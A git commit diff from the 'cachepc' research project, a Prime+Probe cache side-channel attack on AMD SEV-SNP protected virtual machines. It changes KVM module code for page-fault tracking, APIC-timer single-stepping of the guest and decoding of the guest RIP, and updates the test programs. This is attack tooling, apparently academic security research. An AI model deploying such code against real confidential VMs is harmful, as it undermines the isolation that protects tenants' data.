cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
Log | Files | Refs | Submodules | README | sfeed.txt

commit 10d3c8f52dc2c0f498e81946bef8292424fcd1ce
parent d27505ae4dbf2afa659df39d7498cae4b5da4454
Author: Louis Burda <quent.burda@gmail.com>
Date:   Tue, 15 Nov 2022 18:13:11 +0100

Various fixes and improvements

Fixed vmsa decode for getting rip in debug mode. Added state machine to data access tracking. Handle mutliple unexpected data access page faults

Diffstat:
MMakefile | 2+-
Mcachepc/cachepc.h | 5++++-
Mcachepc/kvm.c | 14++++++++++----
Mcachepc/mmu.c | 77++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-------------------
Mcachepc/uapi.h | 8++++++++
Mnotes | 13+++++++------
Mtest/sev-es.c | 2+-
Mtest/sevstep.c | 177+++++++++----------------------------------------------------------------------
8 files changed, 108 insertions(+), 190 deletions(-)

diff --git a/Makefile b/Makefile @@ -25,7 +25,7 @@ load: sudo insmod $(LINUX)/arch/x86/kvm/kvm-amd.ko freq: - sudo cpupower frequency-set -f 2.60GHz + sudo cpupower frequency-set -f 1.5GHz update: git -C $(LINUX) diff 0aaa1e599bee256b3b15643bbb95e80ce7aa9be5 -G. > patch.diff diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h @@ -130,6 +130,9 @@ extern bool cachepc_single_step; extern uint32_t cachepc_track_mode; extern uint32_t cachepc_apic_timer; +extern uint32_t cachepc_track_state; +extern uint32_t cachepc_track_state_next; + extern bool cachepc_inst_fault_avail; extern uint64_t cachepc_inst_fault_gfn; extern uint32_t cachepc_inst_fault_err; @@ -287,6 +290,6 @@ void cachepc_apic_oneshot(uint32_t interval) { native_apic_mem_write(APIC_LVTT, LOCAL_TIMER_VECTOR | APIC_LVT_TIMER_ONESHOT); - native_apic_mem_write(APIC_TDCR, APIC_TDR_DIV_2); + native_apic_mem_write(APIC_TDCR, APIC_TDR_DIV_128); native_apic_mem_write(APIC_TMICT, interval); } diff --git a/cachepc/kvm.c b/cachepc/kvm.c @@ -1,8 +1,8 @@ #include "kvm.h" -#include "events.h" -#include "cachepc.h" -#include "tracking.h" #include "uapi.h" +#include "cachepc.h" +#include "event.h" +#include "track.h" #include "svm/svm.h" @@ -35,6 +35,11 @@ EXPORT_SYMBOL(cachepc_single_step); EXPORT_SYMBOL(cachepc_track_mode); EXPORT_SYMBOL(cachepc_apic_timer); +uint32_t cachepc_track_state; +uint32_t cachepc_track_state_next; +EXPORT_SYMBOL(cachepc_track_state); +EXPORT_SYMBOL(cachepc_track_state_next); + bool cachepc_inst_fault_avail = false; uint64_t cachepc_inst_fault_gfn = 0; uint32_t cachepc_inst_fault_err = 0; @@ -708,7 +713,8 @@ cachepc_kvm_init(void) cachepc_single_step = false; cachepc_track_mode = CPC_TRACK_ACCESS; - cachepc_apic_timer = 200; + + cachepc_track_state = CPC_TRACK_AWAIT_INST_FAULT; cachepc_data_fault_avail = false; cachepc_inst_fault_avail = false; diff --git a/cachepc/mmu.c b/cachepc/mmu.c @@ -3,48 +3,87 @@ #include "../cachepc/event.h" static void -cachepc_uspt_page_fault_handle(struct kvm_vcpu *vcpu, +cachepc_page_fault_handle(struct kvm_vcpu *vcpu, struct kvm_page_fault *fault) { + bool inst_fetch; + if (!kvm_slot_page_track_is_active(vcpu->kvm, fault->slot, fault->gfn, KVM_PAGE_TRACK_ACCESS)) return; - pr_warn("Sevstep: Tracked page fault (gfn:%llu err:%u)\n", + pr_warn("CachePC: Tracked page fault (gfn:%llu err:%u)\n", fault->gfn, fault->error_code); - //pr_warn("Sevstep: Tracked page fault attrs %i %i %i\n", - // fault->present, fault->write, fault->user); + + inst_fetch = fault->error_code & PFERR_FETCH_MASK; + pr_warn("CachePC: Tracked page fault attrs p:%i w:%i x:%i f:%i\n", + fault->present, inst_fetch, fault->write, fault->exec); cachepc_untrack_single(vcpu, fault->gfn, KVM_PAGE_TRACK_ACCESS); if (cachepc_track_mode == CPC_TRACK_DATA_ACCESS) { - if (cachepc_single_step && cachepc_inst_fault_avail) { + if (cachepc_track_state == CPC_TRACK_AWAIT_INST_FAULT) { + /* first fault from instruction fetch */ + pr_warn("CachePC: Got inst fault gfn:%llu err:%u\n", + fault->gfn, fault->error_code); + if (!inst_fetch) + pr_err("CachePC: Expected inst fault but was not on fetch\n"); + + cachepc_inst_fault_gfn = fault->gfn; + cachepc_inst_fault_err = fault->error_code; + cachepc_inst_fault_avail = true; + cachepc_data_fault_avail = false; + + cachepc_single_step = true; + cachepc_apic_timer = 10; + + cachepc_track_state_next = CPC_TRACK_AWAIT_DATA_FAULT; + } else if (cachepc_track_state == CPC_TRACK_AWAIT_DATA_FAULT) { /* second fault from data access */ - pr_warn("Sevstep: Got data fault gfn:%llu err:%u\n", + pr_warn("CachePC: Got data fault gfn:%llu err:%u\n", fault->gfn, fault->error_code); cachepc_data_fault_gfn = fault->gfn; cachepc_data_fault_err = fault->error_code; cachepc_data_fault_avail = true; - cachepc_apic_timer = 160; - } else { - /* first fault from instruction fetch */ - pr_warn("Sevstep: Got inst fault gfn:%llu err:%u\n", + cachepc_single_step = true; + cachepc_apic_timer = 10; + + cachepc_track_state_next = CPC_TRACK_AWAIT_STEP_INTR; + } else if (cachepc_track_state == CPC_TRACK_AWAIT_STEP_INTR) { + /* unexpected extra fault before APIC interrupt */ + pr_err("CachePC: Got unexpected data fault gfn:%llu err:%u\n", fault->gfn, fault->error_code); + pr_err("CachePC: Data access step apic timer too large?\n"); - cachepc_inst_fault_gfn = fault->gfn; - cachepc_inst_fault_err = fault->error_code; - cachepc_inst_fault_avail = true; + cachepc_track_single(vcpu, cachepc_inst_fault_gfn, + KVM_PAGE_TRACK_ACCESS); + cachepc_inst_fault_avail = false; + + cachepc_track_single(vcpu, cachepc_data_fault_gfn, + KVM_PAGE_TRACK_ACCESS); cachepc_data_fault_avail = false; - cachepc_single_step = true; - cachepc_apic_timer = 170; + /* retrack fault we just got so we can start from scratch */ + cachepc_track_single(vcpu, fault->gfn, KVM_PAGE_TRACK_ACCESS); + + cachepc_send_tracking_event( + cachepc_inst_fault_gfn, cachepc_inst_fault_err, + cachepc_data_fault_gfn, cachepc_data_fault_err); + + cachepc_single_step = false; + + cachepc_track_state_next = CPC_TRACK_AWAIT_INST_FAULT; + } else { + pr_err("CachePC: Invalid tracking state: %i\n", cachepc_track_state); + cachepc_track_state_next = CPC_TRACK_AWAIT_INST_FAULT; } } else if (cachepc_track_mode == CPC_TRACK_EXEC_PAGES) { - /* TODO: skip if not exec */ + /* TODO: skip if not instruction decode fault */ /* TODO: calculate retired instructions (save and subtract global counter) */ if (cachepc_inst_fault_avail) { + /* track previous faulted page, current stays untracked */ cachepc_track_single(vcpu, cachepc_inst_fault_gfn, KVM_PAGE_TRACK_ACCESS); } @@ -63,7 +102,7 @@ cachepc_spte_protect(u64 *sptep, bool pt_protect, enum kvm_page_track_mode mode) u64 spte; bool flush; - // pr_warn("Sevstep: spte_protect\n"); + // pr_warn("CachePC: spte_protect\n"); spte = *sptep; if (!is_writable_pte(spte) && !(pt_protect && is_mmu_writable_spte(spte))) @@ -98,7 +137,7 @@ cachepc_spte_protect(u64 *sptep, bool pt_protect, enum kvm_page_track_mode mode) } flush |= mmu_spte_update(sptep, spte); - // pr_warn("Sevstep: spte_protect flush:%i\n", flush); + // pr_warn("CachePC: spte_protect flush:%i\n", flush); return flush; } @@ -130,7 +169,7 @@ cachepc_kvm_mmu_slot_gfn_protect(struct kvm *kvm, struct kvm_memory_slot *slot, protected = false; - // pr_warn("Sevstep: mmu_slot_gfn_protect gfn:%llu\n", gfn); + // pr_warn("CachePC: mmu_slot_gfn_protect gfn:%llu\n", gfn); if (kvm_memslots_have_rmaps(kvm)) { for (i = min_level; i <= KVM_MAX_HUGEPAGE_LEVEL; ++i) { diff --git a/cachepc/uapi.h b/cachepc/uapi.h @@ -21,6 +21,8 @@ #define CPC_MSRMT_MAX (~((cpc_msrmt_t) 0)) +#define CPC_VMSA_MAGIC_ADDR ((void *) 0xC0FFEE) + #define KVM_CPC_TEST_ACCESS _IOWR(KVMIO, 0x20, __u32) #define KVM_CPC_TEST_EVICTION _IOWR(KVMIO, 0x21, __u32) #define KVM_CPC_INIT_PMC _IOW(KVMIO, 0x22, __u32) @@ -47,6 +49,12 @@ enum { CPC_TRACK_EXEC_PAGES }; +enum { + CPC_TRACK_AWAIT_INST_FAULT, + CPC_TRACK_AWAIT_DATA_FAULT, + CPC_TRACK_AWAIT_STEP_INTR +}; + enum kvm_page_track_mode { KVM_PAGE_TRACK_WRITE, KVM_PAGE_TRACK_ACCESS, diff --git a/notes b/notes @@ -1,7 +1,4 @@ Observations: -- some times get extra faults with race condition.. think there is - a race cond with track_page and something is untracking the pages again -- on Questions: - test/sevstep: why 0 then 15, arent both accesses in the first page? @@ -18,9 +15,13 @@ Next steps: - try adjusting timer for single stepping - Try to setup the non-baseline step without apic, but remapping page such that we see the relevant page faults and the gfn increment -- need to not retrack, allow the page to get remapped - (return false from sevstep_uspt_track.. caller) and enable single_step, - THEN when interrupt hits retrack the page - test/sevstep: implement counter.. read program memory to see how many instructions were executed on apic timer - add warning for high values in baseline + +Meeting questions: +- Why is decrypted rip sometimes off-by-one? + => +- VM gets interrupted independent of our APIC (by the scheduler) is this a problem? + => +- diff --git a/test/sev-es.c b/test/sev-es.c @@ -446,7 +446,7 @@ collect(struct kvm *kvm) memset(&regs, 0, sizeof(regs)); ret = ioctl(kvm->vcpufd, KVM_GET_REGS, &regs); if (ret < 0) err(1, "KVM_GET_REGS"); - errx(1, "KVM_EXTI_MMIO: Victim %s at 0x%08llx: rip=0x%08llx\n", + errx(1, "KVM_EXIT_MMIO: Victim %s at 0x%08llx: rip=0x%08llx\n", kvm->run->mmio.is_write ? "write" : "read", kvm->run->mmio.phys_addr, regs.rip); } else if (kvm->run->exit_reason != KVM_EXIT_HLT) { diff --git a/test/sevstep.c b/test/sevstep.c @@ -114,149 +114,10 @@ hexdump(void *data, int len) __attribute__((section("guest_with"))) void vm_guest_with(void) { - /* counter starts at 10 */ - // asm volatile("mov $10, %%ebx" : : : "ebx"); - - //while (1) { - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - /* read from n'th page */ - // asm volatile("mov %0, %%ecx" : : "r" (L1_LINESIZE * L1_SETS) : "ecx"); - // asm volatile("mov %%ebx, %%eax" : : : "ebx", "eax"); - // asm volatile("imul %%ecx" : : : "ecx"); - // asm volatile("mov (%%eax), %%al" : : : "rax"); - - /* increment counter (n) */ - // asm volatile("inc %%ebx" : : : "ebx"); - - /* modulo 16 */ - // asm volatile("xor %%edx, %%edx" : : : "edx"); - // asm volatile("mov %%ebx, %%eax" : : : "ebx", "eax"); - // asm volatile("mov $16, %%ecx" : : : "ecx"); - // asm volatile("idiv %%ecx" : : : "ecx"); - // asm volatile("mov %%edx, %%ebx" : : : "ebx", "edx"); - - /* L1_LINESIZE * (L1_SETS * 2 + TARGET_SET) = 0x23c0 */ - //asm volatile("movq $0x23c0, %%rcx; mov %%eax, (%%rcx); inc %%eax" - // : : : "eax", "ebx", "rcx"); - //} - - asm volatile("hlt"); + while (1) { + asm volatile("mov (%0), %%eax" : : + "r" (L1_LINESIZE * (L1_SETS * 3 + TARGET_SET)) : "rax"); + } } bool @@ -418,18 +279,20 @@ sev_dbg_rip(int vmfd) { void *vmsa; uint64_t rip; - uint8_t buf[16]; int ret; vmsa = NULL; if (posix_memalign(&vmsa, PAGE_SIZE, PAGE_SIZE)) err(1, "memalign"); + memset(vmsa, 0, PAGE_SIZE); ret = ioctl(kvm_dev, KVM_CPC_VMSA_READ, vmsa); if (ret == -1) err(1, "ioctl VMSA_READ"); - sev_dbg_decrypt(vmfd, buf, vmsa + 0x160, 16); - hexdump(buf, 16); + sev_dbg_decrypt(vmfd, vmsa, CPC_VMSA_MAGIC_ADDR, PAGE_SIZE); + // hexdump(vmsa, PAGE_SIZE); + + rip = *(uint64_t *)(vmsa + 0x178); free(vmsa); @@ -551,13 +414,19 @@ cpc_msrmt_t * read_counts() { cpc_msrmt_t *counts; - int ret; + int i, ret; - counts = malloc(64 * sizeof(cpc_msrmt_t)); + counts = malloc(L1_SETS * sizeof(cpc_msrmt_t)); if (!counts) err(1, "malloc"); + ret = ioctl(kvm_dev, KVM_CPC_READ_COUNTS, counts); if (ret == -1) err(1, "ioctl READ_COUNTS"); + for (i = 0; i < L1_SETS; i++) { + if (counts[i] > 8) + errx(1, "Invalid counts set %i", i); + } + return counts; } @@ -608,14 +477,6 @@ runonce(struct kvm *kvm) if (ret < 0) err(1, "KVM_RUN"); } -uint64_t -svm_dbg_rip(struct kvm *kvm) -{ - /* TODO: decrypt vmsa */ - - return 0; -} - int monitor(struct kvm *kvm, bool baseline) { @@ -728,7 +589,7 @@ main(int argc, const char **argv) if (ret == -1) err(1, "ioctl MEASURE_BASELINE"); faultcnt = 0; - while (faultcnt < 20) { + while (faultcnt < 30) { if (monitor(&kvm_with_access, true)) break; } @@ -765,7 +626,7 @@ main(int argc, const char **argv) if (ret == -1) err(1, "ioctl ACK_EVENT"); faultcnt = 0; - while (faultcnt < 20) { + while (faultcnt < 30) { if (monitor(&kvm_with_access, false)) break; }